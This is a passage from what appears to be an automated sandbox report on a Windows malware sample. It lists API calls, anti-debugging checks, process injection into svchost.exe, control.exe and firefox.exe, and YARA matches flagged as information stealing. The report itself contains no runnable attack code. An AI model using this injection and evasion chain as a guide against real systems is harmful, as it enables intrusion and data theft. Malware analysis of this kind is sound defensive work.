                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]2_2_03904940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]2_2_039008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 6636Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeThread APC queued: target process: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F23008Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                Source: HJizhlDIjKVk.exe, 00000006.00000000.2433624565.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581755446.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000000.2576121590.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, HJizhlDIjKVk.exe, 00000006.00000000.2433624565.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581755446.00000000014C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: HJizhlDIjKVk.exe, 00000006.00000000.2433624565.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581755446.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000000.2576121590.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: HJizhlDIjKVk.exe, 00000006.00000000.2433624565.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581755446.00000000014C1000.00000002.00000001.00040000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000000.2576121590.0000000001940000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
